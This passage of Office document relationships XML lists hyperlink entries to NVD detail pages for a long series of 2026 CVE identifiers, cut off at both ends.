Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65936" TargetMode="External" Id="rId5113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66058" TargetMode="External" Id="rId5114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66059" TargetMode="External" Id="rId5115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66062" TargetMode="External" Id="rId5116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66778" TargetMode="External" Id="rId5117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67302" TargetMode="External" Id="rId5118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67306" TargetMode="External" Id="rId5119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67310" TargetMode="External" Id="rId5120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67332" TargetMode="External" Id="rId5121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68552" TargetMode="External" Id="rId5122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69094" TargetMode="External" Id="rId5123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69207" TargetMode="External" Id="rId5124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70466" TargetMode="External" Id="rId5125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70487" TargetMode="External" Id="rId5126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70575" TargetMode="External" Id="rId5127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70607" TargetMode="External" Id="rId5128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71216" TargetMode="External" Id="rId5129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71408" TargetMode="External" Id="rId5130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71433" TargetMode="External" Id="rId5131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71434" TargetMode="External" Id="rId5132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71436" TargetMode="External" Id="rId5133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71439" TargetMode="External" Id="rId5134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71848" TargetMode="External" Id="rId5135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72721" TargetMode="External" Id="rId5136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72723" TargetMode="External" Id="rId5137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72834" TargetMode="External" Id="rId5138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73082" TargetMode="External" Id="rId5139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73085" TargetMode="External" Id="rId5140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73219" TargetMode="External" Id="rId5141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73221" TargetMode="External" Id="rId5142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73244" TargetMode="External" Id="rId5143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73290" TargetMode="External" Id="rId5144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73306" TargetMode="External" Id="rId5145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73422" TargetMode="External" Id="rId5146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73429" TargetMode="External" Id="rId5147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73430" TargetMode="External" Id="rId5148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73474" TargetMode="External" Id="rId5149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73508" TargetMode="External" Id="rId5150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73531" TargetMode="External" Id="rId5151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73555" TargetMode="External" Id="rId5152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73556" TargetMode="External" Id="rId5153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73558" TargetMode="External" Id="rId5154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73565" TargetMode="External" Id="rId5155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73628" TargetMode="External" Id="rId5156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73789" TargetMode="External" Id="rId5157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73840" TargetMode="External" Id="rId5158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75841" TargetMode="External" Id="rId5159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75845" TargetMode="External" Id="rId5160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76614" TargetMode="External" Id="rId5161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76653" TargetMode="External" Id="rId5162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77121" TargetMode="External" Id="rId5163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77122" TargetMode="External" Id="rId5164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77132" TargetMode="External" Id="rId5165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77310" TargetMode="External" Id="rId5166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77341" TargetMode="External" Id="rId5167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77507" TargetMode="External" Id="rId5168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77639" TargetMode="External" Id="rId5169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77640" TargetMode="External" Id="rId5170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78149" TargetMode="External" Id="rId5171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78446" TargetMode="External" Id="rId5172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78602" TargetMode="External" Id="rId5173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78631" TargetMode="External" Id="rId5174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79630" TargetMode="External" Id="rId5175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79631" TargetMode="External" Id="rId5176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79632" TargetMode="External" Id="rId5177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79638" TargetMode="External" Id="rId5178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79741" TargetMode="External" Id="rId5179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79946" TargetMode="External" Id="rId5180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79952" TargetMode="External" Id="rId5181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79961" TargetMode="External" Id="rId5182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79964" TargetMode="External" Id="rId5183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79965" TargetMode="External" Id="rId5184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79971" TargetMode="External" Id="rId5185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80174" TargetMode="External" Id="rId5186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80339" TargetMode="External" Id="rId5187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80340" TargetMode="External" Id="rId5188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81021" TargetMode="External" Id="rId5189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81022" TargetMode="External" Id="rId5190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81162" TargetMode="External" Id="rId5191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81269" TargetMode="External" Id="rId5192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81380" TargetMode="External" Id="rId5193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81424" TargetMode="External" Id="rId5194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81647" TargetMode="External" Id="rId5195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82023" TargetMode="External" Id="rId5196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId5197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82184" TargetMode="External" Id="rId5198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82213" TargetMode="External" Id="rId5199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82305" TargetMode="External" Id="rId5200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82394" TargetMode="External" Id="rId5201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82395" TargetMode="External" Id="rId5202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82464" TargetMode="External" Id="rId5203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82582" TargetMode="External" Id="rId5204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82633" TargetMode="External" Id="rId5205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82660" TargetMode="External" Id="rId5206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82661" TargetMode="External" Id="rId5207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8279" TargetMode="External" Id="rId5208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82848" TargetMode="External" Id="rId5209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82867" TargetMode="External" Id="rId5210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82868" TargetMode="External" Id="rId5211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82873" TargetMode="External" Id="rId5212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82878" TargetMode="External" Id="rId5213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82879" TargetMode="External" Id="rId5214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83537" TargetMode="External" Id="rId5215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84043" TargetMode="External" Id="rId5216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84044" TargetMode="External" Id="rId5217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84045" TargetMode="External" Id="rId5218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84062" TargetMode="External" Id="rId5219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84146" TargetMode="External" Id="rId5220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84191" TargetMode="External" Id="rId5221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84206" TargetMode="External" Id="rId5222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84207" TargetMode="External" Id="rId5223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84222" TargetMode="External" Id="rId5224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84364" TargetMode="External" Id="rId5225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84379" TargetMode="External" Id="rId5226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84432" TargetMode="External" Id="rId5227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84908" TargetMode="External" Id="rId5228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84936" TargetMode="External" Id="rId5229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85037" TargetMode="External" Id="rId5230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85038" TargetMode="External" Id="rId5231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85090" TargetMode="External" Id="rId5232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85158" TargetMode="External" Id="rId5233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85159" TargetMode="External" Id="rId5234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85161" TargetMode="External" Id="rId5235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85172" TargetMode="External" Id="rId5236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85173" TargetMode="External" Id="rId5237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85210" TargetMode="External" Id="rId5238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85226" TargetMode="External" Id="rId5239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85230" TargetMode="External" Id="rId5240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85392" TargetMode="External" Id="rId5241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85453" TargetMode="External" Id="rId5242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85528" TargetMode="External" Id="rId5243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85577" TargetMode="External" Id="rId5244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85579" TargetMode="External" Id="rId5245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85587" TargetMode="External" Id="rId5246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85588" TargetMode="External" Id="rId5247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85589" TargetMode="External" Id="rId5248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85611" TargetMode="External" Id="rId5249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85615" TargetMode="External" Id="rId5250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86100" TargetMode="External" Id="rId5251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86112" TargetMode="External" Id="rId5252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86115" TargetMode="External" Id="rId5253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86118" TargetMode="External" Id="rId5254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86120" TargetMode="External" Id="rId5255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86122" TargetMode="External" Id="rId5256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86174" TargetMode="External" Id="rId5257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86176" TargetMode="External" Id="rId5258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86178" TargetMode="External" Id="rId5259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86191" TargetMode="External" Id="rId5260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86202" TargetMode="External" Id="rId5261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86205" TargetMode="External" Id="rId5262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86342" TargetMode="External" Id="rId5263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86416" TargetMode="External" Id="rId5264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86417" TargetMode="External" Id="rId5265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86436" TargetMode="External" Id="rId5266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86451" TargetMode="External" Id="rId5267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86469" TargetMode="External" Id="rId5268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86714" TargetMode="External" Id="rId5269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86719" TargetMode="External" Id="rId5270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86736" TargetMode="External" Id="rId5271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86737" TargetMode="External" Id="rId5272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86743" TargetMode="External" Id="rId5273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86747" TargetMode="External" Id="rId5274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86752" TargetMode="External" Id="rId5275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86753" TargetMode="External" Id="rId5276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86755" 